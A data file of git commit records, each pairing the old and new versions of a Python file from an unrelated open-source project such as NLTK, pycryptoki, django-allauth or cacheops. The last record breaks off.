3a4cfdfbb6f14e5f54b3ac3a57cb13ac1dfd40f9 | Remove 'punkt_word_tokenize' from tokenize.__all__. This function should not be necessary. | nltk/nltk,nltk/nltk,nltk/nltk | nltk/tokenize/__init__.py | nltk/tokenize/__init__.py | # Natural Language Toolkit: Tokenizers
#
# Copyright (C) 2001-2008 NLTK Project
# Author: Edward Loper <edloper@gradient.cis.upenn.edu>
# Steven Bird <sb@csse.unimelb.edu.au> (minor additions)
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
"""
Functions for X{tokenizing}, i.e., dividing text strings into
substrings.
"""
from simple import *
from regexp import *
from punkt import *
from sexpr import *
from nltk.internals import deprecated
__all__ = ['WhitespaceTokenizer', 'SpaceTokenizer', 'TabTokenizer',
'LineTokenizer', 'RegexpTokenizer', 'BlanklineTokenizer',
'WordPunctTokenizer', 'WordTokenizer', 'blankline_tokenize',
'wordpunct_tokenize', 'regexp_tokenize', 'word_tokenize',
'SExprTokenizer', 'sexpr_tokenize', 'line_tokenize',
'PunktWordTokenizer', 'PunktSentenceTokenizer',
]
######################################################################
#{ Deprecated since 0.8
######################################################################
@deprecated("Use nltk.blankline_tokenize() or "
            "nltk.BlanklineTokenizer instead.")
def blankline(text):
    """Deprecated alias for BlanklineTokenizer().tokenize(text)."""
    return BlanklineTokenizer().tokenize(text)
@deprecated("Use nltk.wordpunct_tokenize() or "
            "nltk.WordPunctTokenizer instead.")
def wordpunct(text):
    """Deprecated alias for WordPunctTokenizer().tokenize(text)."""
    return WordPunctTokenizer().tokenize(text)
@deprecated("Use str.split() or nltk.WhitespaceTokenizer instead.")
def whitespace(text):
    """Deprecated alias for WhitespaceTokenizer().tokenize(text)."""
    return WhitespaceTokenizer().tokenize(text)
@deprecated("Use nltk.word_tokenize() or "
            "nltk.WordTokenizer instead.")
def word(text):
    """Deprecated alias for WordTokenizer().tokenize(text)."""
    return WordTokenizer().tokenize(text)
@deprecated("Use nltk.line_tokenize() or "
            "nltk.LineTokenizer instead.")
def line(text):
    """Deprecated alias for LineTokenizer().tokenize(text)."""
    return LineTokenizer().tokenize(text)
#}
| # Natural Language Toolkit: Tokenizers
#
# Copyright (C) 2001-2008 NLTK Project
# Author: Edward Loper <edloper@gradient.cis.upenn.edu>
# Steven Bird <sb@csse.unimelb.edu.au> (minor additions)
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
"""
Functions for X{tokenizing}, i.e., dividing text strings into
substrings.
"""
from simple import *
from regexp import *
from punkt import *
from sexpr import *
from nltk.internals import deprecated
__all__ = ['WhitespaceTokenizer', 'SpaceTokenizer', 'TabTokenizer',
'LineTokenizer', 'RegexpTokenizer', 'BlanklineTokenizer',
'WordPunctTokenizer', 'WordTokenizer', 'blankline_tokenize',
'wordpunct_tokenize', 'regexp_tokenize', 'word_tokenize',
'SExprTokenizer', 'sexpr_tokenize', 'line_tokenize',
'PunktWordTokenizer', 'punkt_word_tokenize',
'PunktSentenceTokenizer',
]
######################################################################
#{ Deprecated since 0.8
######################################################################
@deprecated("Use nltk.blankline_tokenize() or "
"nltk.BlanklineTokenizer instead.")
def blankline(text):
return BlanklineTokenizer().tokenize(text)
@deprecated("Use nltk.wordpunct_tokenize() or "
"nltk.WordPunctTokenizer instead.")
def wordpunct(text):
return WordPunctTokenizer().tokenize(text)
@deprecated("Use str.split() or nltk.WhitespaceTokenizer instead.")
def whitespace(text):
return WhitespaceTokenizer().tokenize(text)
@deprecated("Use nltk.word_tokenize() or "
"nltk.WordTokenizer instead.")
def word(text):
return WordTokenizer().tokenize(text)
@deprecated("Use nltk.line_tokenize() or "
"nltk.LineTokenizer instead.")
def line(text):
return LineTokenizer().tokenize(text)
#}
| apache-2.0 | Python |
e692b2f3dc7e45c389f6a4a1969229fd04f617f7 | Fix up IO-to-pin iterable lists. | synapse-wireless/pyduino-includes | pyduinoincludes/io.py | pyduinoincludes/io.py | # Copyright (C) 2016 Synapse Wireless, Inc.
# Subject to your agreement of the disclaimer set forth below, permission is given by Synapse Wireless, Inc. ("Synapse") to you to freely modify, redistribute or include this SNAPpy code in any program. The purpose of this code is to help you understand and learn about SNAPpy by code examples.
# BY USING ALL OR ANY PORTION OF THIS SNAPPY CODE, YOU ACCEPT AND AGREE TO THE BELOW DISCLAIMER. If you do not accept or agree to the below disclaimer, then you may not use, modify, or distribute this SNAPpy code.
# THE CODE IS PROVIDED UNDER THIS LICENSE ON AN "AS IS" BASIS, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES THAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN ANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME THE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. UNDER NO CIRCUMSTANCES WILL SYNAPSE BE LIABLE TO YOU, OR ANY OTHER PERSON OR ENTITY, FOR ANY LOSS OF USE, REVENUE OR PROFIT, LOST OR DAMAGED DATA, OR OTHER COMMERCIAL OR ECONOMIC LOSS OR FOR ANY DAMAGES WHATSOEVER RELATED TO YOUR USE OR RELIANCE UPON THE SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES OR IF SUCH DAMAGES ARE FORESEEABLE. THIS DISCLAIMER OF WARRANTY AND LIABILITY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED CODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.
"""GPIO-related assignments for the Pyduino based on the Synapse SM220 module."""
# GPIO enums to be used in example scripts, mapped to Pyduino IO numbers as supported by the SNAP core firmware
D0 = 16
D1 = 17
D2 = 20
D3 = 5
D4 = 23
D5 = 6
D6 = 7
D7 = 12
D8 = 0
D9 = 19
D10 = 21
D11 = 37
D12 = 4
D13 = 22
SDA = 9
SCL = 8
# Analog channels
A0 = 0
A1 = 1
A2 = 4
A3 = 5
A4 = 6
A5 = 7
SENSE_5V = 2
# User-controlled LED
LED_PIN = 18
# List of pin assignments that can be iterated over in Pyduino-pin-order (i.e. D0 is 16, D1 is 17, etc...)
DIGITAL_TO_IO_LIST = (16, 17, 20, 5, 23, 6, 7, 12, 0, 19, 21, 37, 4, 22, 9, 8)
ANALOG_LIST = (A0, A1, A2, A3, A4, A5)
| # Copyright (C) 2016 Synapse Wireless, Inc.
# Subject to your agreement of the disclaimer set forth below, permission is given by Synapse Wireless, Inc. ("Synapse") to you to freely modify, redistribute or include this SNAPpy code in any program. The purpose of this code is to help you understand and learn about SNAPpy by code examples.
# BY USING ALL OR ANY PORTION OF THIS SNAPPY CODE, YOU ACCEPT AND AGREE TO THE BELOW DISCLAIMER. If you do not accept or agree to the below disclaimer, then you may not use, modify, or distribute this SNAPpy code.
# THE CODE IS PROVIDED UNDER THIS LICENSE ON AN "AS IS" BASIS, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES THAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN ANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME THE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. UNDER NO CIRCUMSTANCES WILL SYNAPSE BE LIABLE TO YOU, OR ANY OTHER PERSON OR ENTITY, FOR ANY LOSS OF USE, REVENUE OR PROFIT, LOST OR DAMAGED DATA, OR OTHER COMMERCIAL OR ECONOMIC LOSS OR FOR ANY DAMAGES WHATSOEVER RELATED TO YOUR USE OR RELIANCE UPON THE SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES OR IF SUCH DAMAGES ARE FORESEEABLE. THIS DISCLAIMER OF WARRANTY AND LIABILITY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED CODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.
"""GPIO-related assignments for the Pyduino based on the Synapse SM220 module."""
# GPIO enums to be used in example scripts, mapped to Pyduino IO numbers as supported by the SNAP core firmware
D0 = 16
D1 = 17
D2 = 20
D3 = 5
D4 = 23
D5 = 6
D6 = 7
D7 = 12
D8 = 0
D9 = 19
D10 = 21
D11 = 37
D12 = 4
D13 = 22
SDA = 9
SCL = 8
# Analog channels
A0 = 0
A1 = 1
A2 = 4
A3 = 5
A4 = 6
A5 = 7
SENSE_5V = 2
# User-controlled LED
LED_PIN = 18
# List of pin assignments that can be iterated over in GPIO-order (i.e. GPIO 0 is 16, GPIO 1 is 17, etc...)
GPIO_TO_IO_LIST = (16,17,20,5,23,6,7,12,0,19,21,37,4,22,9,8)
| apache-2.0 | Python |
cb876e51d18c17efb662e1725a8ae6206f2d8e9f | update __init__.py file | christophreimer/pygeobase | pygeobase/__init__.py | pygeobase/__init__.py | import pkg_resources
try:
    # Report the installed distribution's version at import time.
    __version__ = pkg_resources.get_distribution(__name__).version
except Exception:
    # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt are not
    # swallowed; fall back when the package is not installed (e.g. a source
    # checkout, where get_distribution raises DistributionNotFound).
    __version__ = 'unknown'
| from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
| bsd-3-clause | Python |
5b5f2b05251b991620c29316dbfeac52f8cfa119 | Update helper example/callback.py with some output verbose | JonathanSalwan/Triton,JonathanSalwan/Triton,JonathanSalwan/Triton,JonathanSalwan/Triton,JonathanSalwan/Triton | examples/callback.py | examples/callback.py |
from triton import *
# Output
#
# TID (0) 0x40056d push rbp
# TID (0) 0x40056e mov rbp, rsp
# TID (0) 0x400571 mov qword ptr [rbp-0x18], rdi
# TID (0) 0x400575 mov dword ptr [rbp-0x4], 0x0
# TID (0) 0x40057c jmp 0x4005bd
# TID (0) 0x4005bd cmp dword ptr [rbp-0x4], 0x4
# TID (0) 0x4005c1 jle 0x40057e
# TID (0) 0x40057e mov eax, dword ptr [rbp-0x4]
# TID (0) 0x400581 movsxd rdx, eax
# TID (0) 0x400584 mov rax, qword ptr [rbp-0x18]
# TID (0) 0x400588 add rax, rdx
# TID (0) 0x40058b movzx eax, byte ptr [rax]
# TID (0) 0x40058e movsx eax, al
# TID (0) 0x400591 sub eax, 0x1
# TID (0) 0x400594 xor eax, 0x55
# TID (0) 0x400597 mov ecx, eax
# TID (0) 0x400599 mov rdx, qword ptr [rip+0x200aa0]
# TID (0) 0x4005a0 mov eax, dword ptr [rbp-0x4]
# TID (0) 0x4005a3 cdqe
# TID (0) 0x4005a5 add rax, rdx
# TID (0) 0x4005a8 movzx eax, byte ptr [rax]
# TID (0) 0x4005ab movsx eax, al
# TID (0) 0x4005ae cmp ecx, eax
# TID (0) 0x4005b0 jz 0x4005b9
# TID (0) 0x4005b2 mov eax, 0x1
# TID (0) 0x4005b7 jmp 0x4005c8
# TID (0) 0x4005c8 pop rbp
# A callback must be a function with one argument. This argument is always a dict and contains all information
def my_callback_before(instruction):
    """Print thread id, address and disassembly of each executed instruction."""
    print 'TID (%d) %#x %s' %(instruction['threadId'], instruction['address'], instruction['assembly'])
if __name__ == '__main__':
# Start the symbolic analysis from the 'check' function
startAnalysisFromSymbol('check')
# Add a callback.
# CB_BEFORE: Add the callback before the instruction processing
# CB_AFTER: Add the callback after the instruction processing
addCallback(my_callback_before, CB_BEFORE)
# Run the instrumentation - Never returns
runProgram()
|
from triton import *
def my_callback_before(instruction):
print 'TID (%d) %#x %s' %(instruction['threadId'], instruction['address'], instruction['assembly'])
if __name__ == '__main__':
# Start the symbolic analysis from the 'check' function
startAnalysisFromSymbol('check')
# Add a callback
addCallback(my_callback_before, CB_BEFORE)
# Run the instrumentation - Never returns
runProgram()
| apache-2.0 | Python |
b9f8d73c984e21915a60d986d5f49fb4b2cb7470 | Update defaults.py | gemalto/pycryptoki | pycryptoki/defaults.py | pycryptoki/defaults.py | """
A file containing commonly used strings or other data similar to a config file
"""
# The location of the cryptoki file, if specified as None the environment variable
# ChrystokiConfigurationPath will be used or it will revert to using /etc/Chrystoki.conf
import os
CHRYSTOKI_CONFIG_FILE = None
# The location of the DLL file, if not specified it will try to look up the file in
# the Chrystoki config file specified be the variable CHRYSTOKI_CONFIG_FILE
CHRYSTOKI_DLL_FILE = None
ADMIN_PARTITION_LABEL = 'no label'
AUDITOR_LABEL = 'auditorlabel'
ADMINISTRATOR_USERNAME = 'Administrator'
ADMINISTRATOR_PASSWORD = 'sopin'
AUDITOR_USERNAME = 'Auditor'
AUDITOR_PASSWORD = 'auditpin'
CO_USERNAME = 'Crypto Officer'
CO_PASSWORD = 'userpin'
DEFAULT_USERNAME = 'default_user'
DEFAULT_LABEL = 'default_label'
DEFAULT_PASSWORD = 'userpin'
DEFAULT_UTILS_PATH = '/usr/safenet/lunaclient/sbin'
FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
user_credentials = {ADMINISTRATOR_USERNAME: ADMINISTRATOR_PASSWORD,
AUDITOR_USERNAME: AUDITOR_PASSWORD,
CO_USERNAME: CO_PASSWORD,
DEFAULT_USERNAME: DEFAULT_PASSWORD}
DES3_KEY_SIZE = 120
MANUFACTURER_ID = "SafeNet Inc."
MODEL = "Luna K6"
ADMIN_SLOT = int(os.environ.get("ADMIN_SLOT", 1))
| """
A file containing commonly used strings or other data similar to a config file
"""
# The location of the cryptoki file, if specified as None the environment variable
# ChrystokiConfigurationPath will be used or it will revert to using /etc/Chrystoki.conf
import os
CHRYSTOKI_CONFIG_FILE = None
# The location of the DLL file, if not specified it will try to look up the file in
# the Chrystoki config file specified be the variable CHRYSTOKI_CONFIG_FILE
CHRYSTOKI_DLL_FILE = None
ADMIN_PARTITION_LABEL = 'no label'
AUDITOR_LABEL = 'auditorlabel'
ADMINISTRATOR_USERNAME = 'Administrator'
ADMINISTRATOR_PASSWORD = '1q@W3e$R'
AUDITOR_USERNAME = 'Auditor'
AUDITOR_PASSWORD = 'W3e$R'
CO_USERNAME = 'Crypto Officer'
CO_PASSWORD = 'userpin'
DEFAULT_USERNAME = 'default_user'
DEFAULT_LABEL = 'default_label'
DEFAULT_PASSWORD = 'userpin'
DEFAULT_UTILS_PATH = '/usr/safenet/lunaclient/sbin'
FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
user_credentials = {ADMINISTRATOR_USERNAME: ADMINISTRATOR_PASSWORD,
AUDITOR_USERNAME: AUDITOR_PASSWORD,
CO_USERNAME: CO_PASSWORD,
DEFAULT_USERNAME: DEFAULT_PASSWORD}
DES3_KEY_SIZE = 120
MANUFACTURER_ID = "SafeNet Inc."
MODEL = "Luna K6"
ADMIN_SLOT = int(os.environ.get("ADMIN_SLOT", 1))
| apache-2.0 | Python |
26df9fbabc1bc23644fede1cee4405454ea73b0d | Optimize SDE integration | kpj/SDEMotif,kpj/SDEMotif | solver.py | solver.py | """
Solve stochastic differential equation
"""
import numpy as np
import numpy.random as npr
def solve_system(system, tmax=50, dt=0.1, seed=None):
    """ Solve stochastic differential equation (SDE)

    Integrates dX = J.X dt + E dt + noise with fixed step `dt` up to `tmax`
    and returns the trajectory as an array of shape (dim, num_steps).
    `seed` makes the noise reproducible.
    """
    J = system.jacobian              # linear interaction matrix (dim x dim)
    D = system.fluctuation_vector    # per-component fluctuation strengths
    E = system.external_influence    # constant external drive
    dim = J.shape[0]
    state = system.initial_state
    evolution = []
    dtsq = np.sqrt(dt)
    tdsq = np.sqrt(2*D)
    np.seterr(all='raise')  # fail loudly on overflow/invalid instead of warning
    npr.seed(seed)
    t = 0
    while t < tmax:
        evolution.append(state)
        # NOTE(review): the noise term is scaled by sqrt(dt) here AND by dt in
        # the update below, giving an overall dt**1.5 factor; a standard
        # Euler-Maruyama step uses sqrt(dt) only -- confirm this is intended
        # (the pre-optimization version used the same scaling).
        delta = J.dot(state) + tdsq * dtsq * npr.normal(size=(dim,)) + E
        state = state + dt * delta
        t += dt
    return np.array(evolution).T
def get_steady_state(sol):
    """Return the steady state of a solution.

    Each column of `sol` is one time point, so the steady state is taken
    to be the final column.
    """
    trajectory = sol.T
    return trajectory[-1]
| """
Solve stochastic differential equation
"""
import numpy as np
import numpy.random as npr
def solve_system(system, tmax=50, dt=0.1, seed=None):
    """ Solve stochastic differential equation (SDE)

    Fixed-step integration up to `tmax`; returns the trajectory as an
    array of shape (dim, num_steps). `seed` makes the noise reproducible.
    """
    J = system.jacobian              # linear interaction matrix (dim x dim)
    D = system.fluctuation_vector    # per-component fluctuation strengths
    E = system.external_influence    # constant external drive
    # Per-component update: linear drift + sqrt(2*D)*sqrt(dt)-scaled Gaussian
    # noise + external drive. The whole thing is multiplied by dt again in the
    # state update below.
    eq = lambda X, i: \
        sum([J[i, j]*X[j] for j in range(J.shape[1])]) \
        + np.sqrt(2 * D[i]) * np.sqrt(dt) * npr.normal() \
        + E[i]
    state = system.initial_state
    evolution = []
    np.seterr(all='raise')  # fail loudly on overflow/invalid instead of warning
    npr.seed(seed)
    t = 0
    while t < tmax:
        evolution.append(state)
        state = state + dt * np.array([eq(state, i) for i in range(J.shape[0])])
        t += dt
    return np.array(evolution).T
def get_steady_state(sol):
    """ Extract steady state from given solution

    `sol` holds one column per time point; the final column is returned.
    """
    return sol.T[-1]
| mit | Python |
9d57de48f4b786ac746be0190f6e21bfecfa165b | Extend variance to 99.9%. | lmjohns3/cube-experiment,lmjohns3/cube-experiment,lmjohns3/cube-experiment | analysis/compress-jacobians.py | analysis/compress-jacobians.py | #!/usr/bin/env python
import climate
import joblib
import lmj.pca
import numpy as np
import os
import database
logging = climate.get_logger('compress')
def extract(trial, prefix):
    """Load a trial and return the values of every dataframe column whose
    name starts with `prefix`, as a single 2-D array (rows x columns)."""
    trial.load()
    selected = [name for name in trial.df.columns if name.startswith(prefix)]
    return trial.df[selected].values
@climate.annotate(
    root='load experiment data from this root',
    output='store pca and jacobians in this directory',
    pattern=('only load trials matching this pattern', 'option'),
    count=('only use this many jacobians for PCA', 'option', None, int),
    variance=('retain components to preserve this variance', 'option', None, float),
)
def main(root, output, pattern='*', count=10000, variance=0.999):
    """Fit a PCA per jacobian direction and save compressed encodings.

    For each of the forward ('fwd') and inverse ('inv') jacobians, gathers
    jacobian rows from all matching trials, fits (or reloads) a PCA model,
    and writes the variance-truncated encodings into `output`.
    """
    trials = list(database.Experiment(root).trials_matching(pattern))
    proc = joblib.delayed(extract)
    for prefix in ('fwd', 'inv'):
        jacobia = []
        # Load trials in parallel; drop rows containing absurdly large entries.
        for jacs in joblib.Parallel(-1)(proc(t, 'jac-' + prefix) for t in trials):
            for jac in jacs:
                if np.all(abs(jac) < 1e8):
                    jacobia.append(jac)
        pca = lmj.pca.PCA()
        pca_file = os.path.join(output, 'pca-{}.npz'.format(prefix))
        if os.path.exists(pca_file):
            # Reuse a previously fitted model if one is already on disk.
            pca.load(pca_file)
        else:
            # Fit on a random subsample of at most `count` jacobians.
            idx = np.arange(len(jacobia))
            np.random.shuffle(idx)
            pca.fit(np.asarray([jacobia[i] for i in idx[:count]]))
            pca.save(pca_file)
        # Report how many components each variance level would keep.
        for v in (0.5, 0.8, 0.9, 0.95, 0.98, 0.99, 0.995, 0.998, 0.999):
            print('{:.1f}%: {} components'.format(100 * v, pca.num_components(v)))
        enc = pca.encode(jacobia, retain=variance)
        enc_file = os.path.join(output, 'jac-{}.npy'.format(prefix))
        logging.info('%s: saving %s %s', enc_file, enc.shape, enc.dtype)
        np.save(enc_file, enc)
if __name__ == '__main__':
climate.call(main)
| #!/usr/bin/env python
import climate
import joblib
import lmj.pca
import numpy as np
import os
import database
logging = climate.get_logger('compress')
def jac(trial, prefix):
trial.load()
cols = [c for c in trial.df.columns if c.startswith(prefix)]
return trial.df[cols].values
@climate.annotate(
root='load experiment data from this root',
output='store pca and jacobians in this directory',
pattern=('only load trials matching this pattern', 'option'),
count=('only use this many jacobians for PCA', 'option', None, int),
variance=('retain components to preserve this variance', 'option', None, float),
)
def main(root, output, pattern='*', count=10000, variance=0.99):
trials = list(database.Experiment(root).trials_matching(pattern))
proc = joblib.delayed(jac)
for prefix in ('fwd', 'inv'):
jacobia = []
for jacs in joblib.Parallel(-1)(proc(t, 'jac-' + prefix) for t in trials):
jacobia.extend(jacs)
pca = lmj.pca.PCA()
pca_file = os.path.join(output, 'pca-{}.npz'.format(prefix))
if os.path.exists(pca_file):
pca.load(pca_file)
else:
idx = np.arange(len(jacobia))
np.random.shuffle(idx)
pca.fit(np.asarray([jacobia[i] for i in idx[:count]]))
pca.save(pca_file)
for v in (0.5, 0.8, 0.9, 0.95, 0.98, 0.99):
print('{:.1f}%: {} components'.format(100 * v, pca.num_components(v)))
enc = pca.encode(jacobia, retain=variance)
enc_file = os.path.join(output, 'jac-{}.npy'.format(prefix))
logging.info('%s: saving %s %s', enc_file, enc.shape, enc.dtype)
np.save(enc_file, enc)
if __name__ == '__main__':
climate.call(main)
| mit | Python |
5657c925e5693931320b4eb5738e332d5899120d | Improve EvaluationFactory | SCUEvals/scuevals-api,SCUEvals/scuevals-api | tests/fixtures/factories/evaluation.py | tests/fixtures/factories/evaluation.py | import factory
from .professor import ProfessorFactory
from .section import SectionFactory
from .student import StudentFactory
from scuevals_api import models
from scuevals_api.resources.evaluations import EvaluationSchemaV1
eval_v1_data = {
'attitude': 1,
'availability': 1,
'clarity': 1,
'grading_speed': 1,
'resourcefulness': 1,
'easiness': 1,
'workload': 1,
'recommended': 1,
'comment': 'Love the lectures'
}
EvaluationSchemaV1().load(data=eval_v1_data)
class EvaluationFactory(factory.alchemy.SQLAlchemyModelFactory):
    """Factory producing Evaluation rows with a valid version-1 payload."""
    class Meta:
        model = models.Evaluation
        sqlalchemy_session = models.db.session
    # Schema version of the `data` payload; eval_v1_data is validated against
    # EvaluationSchemaV1 at import time above.
    version = 1
    data = eval_v1_data
    display_grad_year = True
    display_majors = True
    # Related rows are created on demand via sub-factories.
    student = factory.SubFactory(StudentFactory)
    professor = factory.SubFactory(ProfessorFactory)
    section = factory.SubFactory(SectionFactory)
| import factory
from .professor import ProfessorFactory
from .section import SectionFactory
from .student import StudentFactory
from scuevals_api import models
class EvaluationFactory(factory.alchemy.SQLAlchemyModelFactory):
class Meta:
model = models.Evaluation
sqlalchemy_session = models.db.session
version = 1
data = {"test": 1}
display_grad_year = True
display_majors = True
student = factory.SubFactory(StudentFactory)
professor = factory.SubFactory(ProfessorFactory)
section = factory.SubFactory(SectionFactory)
| agpl-3.0 | Python |
6c2c40e5e5915f1ebed1302933d6257a14e163d9 | Fix accidental conflict diff | spool/django-allauth,spool/django-allauth,spool/django-allauth | allauth/socialaccount/providers/eventbrite/provider.py | allauth/socialaccount/providers/eventbrite/provider.py | """Customise Provider classes for Eventbrite API v3."""
from allauth.socialaccount.providers.base import ProviderAccount
from allauth.socialaccount.providers.oauth2.provider import OAuth2Provider
class EventbriteAccount(ProviderAccount):
    """ProviderAccount subclass for Eventbrite."""
    def get_avatar_url(self):
        """Return avatar url.

        NOTE(review): this returns extra_data['image_id'], which by name
        looks like an identifier rather than a URL -- confirm it is the
        intended value for an avatar URL.
        """
        return self.account.extra_data['image_id']
class EventbriteProvider(OAuth2Provider):
    """OAuth2Provider subclass for Eventbrite."""
    id = 'eventbrite'
    name = 'Eventbrite'
    account_class = EventbriteAccount
    def extract_uid(self, data):
        """Extract uid ('id') and ensure it's a str."""
        return str(data['id'])
    def extract_common_fields(self, data):
        """Extract fields from a basic user query.

        Missing keys become None via dict.get, so partial API responses
        still yield a usable mapping.
        """
        return dict(
            emails=data.get('emails'),
            id=data.get('id'),
            name=data.get('name'),
            first_name=data.get('first_name'),
            last_name=data.get('last_name'),
            image_url=data.get('image_url')
        )
provider_classes = [EventbriteProvider]
| """Customise Provider classes for Eventbrite API v3."""
from allauth.socialaccount.providers.base import ProviderAccount
from allauth.socialaccount.providers.oauth2.provider import OAuth2Provider
class EventbriteAccount(ProviderAccount):
"""ProviderAccount subclass for Eventbrite."""
def get_avatar_url(self):
"""Return avatar url."""
return self.account.extra_data['image_id']
class EventbriteProvider(OAuth2Provider):
"""OAuth2Provider subclass for Eventbrite."""
id = 'eventbrite'
name = 'Eventbrite'
account_class = EventbriteAccount
def extract_uid(self, data):
"""Extract uid ('id') and ensure it's a str."""
return str(data['id'])
<<<<<<< HEAD
=======
def get_default_scope(self):
"""Ensure scope is null to fit their API."""
return ['']
>>>>>>> c32ec1de9b8af42147d2977fe173d25643be447a
def extract_common_fields(self, data):
"""Extract fields from a basic user query."""
return dict(
emails=data.get('emails'),
id=data.get('id'),
name=data.get('name'),
first_name=data.get('first_name'),
last_name=data.get('last_name'),
image_url=data.get('image_url')
)
provider_classes = [EventbriteProvider]
| mit | Python |
de611106429ef9c6cfbc13e48cee5e88affe7ab8 | Modify models.py | NTsystems/NoTes-API,NTsystems/NoTes-API,NTsystems/NoTes-API | notes/apps/auth/models.py | notes/apps/auth/models.py | from django.db import models
from django.contrib.auth.models import AbstractBaseUser
class User(AbstractBaseUser):
    """Custom user model authenticated by e-mail address."""
    # NOTE(review): `_` (gettext) is not imported in the visible file -- this
    # line would raise NameError at import time; confirm the import exists.
    password = models.CharField(_('password'), max_length=50)
    e_mail = models.EmailField(unique=True)
    is_admin = models.BooleanField(default=False)
    USERNAME_FIELD = 'e_mail'
    REQUIRED_FIELDS = []
    def get_username(self):
        """ Returns the value of the field nominated by USERNAME_FIELD."""
        return getattr(self, self.USERNAME_FIELD)
    def is_authenticated(self):
        """Return True. This is a way to tell if the user has been authenticated."""
        return True
    def set_password(self, raw_password):
        # NOTE(review): make_password is not imported in the visible file.
        self.password = make_password(raw_password)
    def check_password(self, raw_password):
        # NOTE(review): Django's check_password invokes setter(raw_password)
        # with a single argument, but this inner function also declares
        # `self` -- confirm the extra parameter is intended.
        def setter(self, raw_password):
            self.set_password(raw_password)
            self.save(update_fields=["password"])
        return check_password(raw_password, self.password, setter)
    def set_unusable_password(self):
        self.password = make_password(None)
    class Meta:
        # NOTE(review): Django's Meta option is spelled `permissions`;
        # `permission` is not a recognized option -- confirm.
        permission = ('change_password',)
    def __str__(self):
        # NOTE(review): no `username` attribute is defined on this model
        # (USERNAME_FIELD is 'e_mail') -- this likely raises AttributeError.
        return self.username
class UserProfile(models.Model):
    """Extra per-user profile data, linked 1:1 to User."""
    # This line is required. Links UserProfile to a User model instance.
    user = models.OneToOneField(User)
    first_name = models.CharField(max_length=30, blank=True)
    last_name = models.CharField(max_length=30, blank=True)
    # NOTE(review): blank=True without null=True on a DateField still requires
    # a value at the database level -- confirm this is intended.
    date_of_birth = models.DateField(blank=True)
    place = models.CharField(max_length=50, blank=True)
    state = models.CharField(verbose_name='country', max_length=50, blank=True)
    class Meta:
        # NOTE(review): should probably be `permissions` (Django Meta option).
        permission = ('change_date_of_birth', 'change_place', 'change_state',)
    def get_full_name(self):
        """Return '<first_name> <last_name>' for this profile."""
        full_name = '%s %s' % (self.first_name, self.last_name)
return full_name | from django.db import models
from django.contrib.auth.models import AbstractBaseUser
class User(AbstractBaseUser):
username = models.CharField(max_length=30, unique=True)
password = models.CharField(max_length=30)
is_admin = models.BooleanField(default=False)
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = []
class Meta:
permission = ('change_password',)
def __str__(self):
return self.username
class UserProfile(models.Model):
user = models.OneToOneField(User)
first_name = models.CharField(max_length=30, blank=True)
last_name = models.CharField(max_length=30, blank=True)
date_of_birth = models.DateField(blank=True)
e_mail = models.EmailField(verbose_name='e-mail',blank=True)
place = models.CharField(max_length=50, blank=True)
state = models.CharField(verbose_name='country', max_length=50, blank=True)
class Meta:
permission = ('change_date_of_birth', 'change_place', 'change_state',)
def get_full_name(self):
full_name = '%s %s' % (self.first_name, self.last_name)
return full_name | mit | Python |
5af50ae039c72b495ba0dff12cdfca4e1adf6769 | Add a TODO to sharding | LPgenerator/django-cacheops,Suor/django-cacheops | cacheops/sharding.py | cacheops/sharding.py | from funcy import cached_property
from django.core.exceptions import ImproperlyConfigured
from .conf import settings
def get_prefix(**kwargs):
return settings.CACHEOPS_PREFIX(PrefixQuery(**kwargs))
class PrefixQuery(object):
    """Lazy view over a query used to compute cache-key prefixes.

    Constructed either from a queryset (`_queryset`) or from explicit
    `dbs`/`tables`/`_cond_dnfs` keyword arguments; each derived attribute
    is computed at most once via `cached_property`.
    """
    def __init__(self, **kwargs):
        # Only these keys may be supplied; everything else is derived lazily.
        assert set(kwargs) <= {'func', '_queryset', '_cond_dnfs', 'dbs', 'tables'}
        kwargs.setdefault('func', None)
        self.__dict__.update(kwargs)
    @cached_property
    def dbs(self):
        return [self._queryset.db]
    @cached_property
    def db(self):
        # Valid only when the query touches a single database.
        if len(self.dbs) > 1:
            dbs_str = ', '.join(self.dbs)
            raise ImproperlyConfigured('Single db required, but several used: ' + dbs_str)
        return self.dbs[0]
    # TODO: think if I should expose it and how. Same for queryset.
    @cached_property
    def _cond_dnfs(self):
        return self._queryset._cond_dnfs
    @cached_property
    def tables(self):
        return list(self._cond_dnfs)
    @cached_property
    def table(self):
        # Valid only when the query touches a single table.
        if len(self.tables) > 1:
            tables_str = ', '.join(self.tables)
            raise ImproperlyConfigured('Single table required, but several used: ' + tables_str)
        return self.tables[0]
| from funcy import cached_property
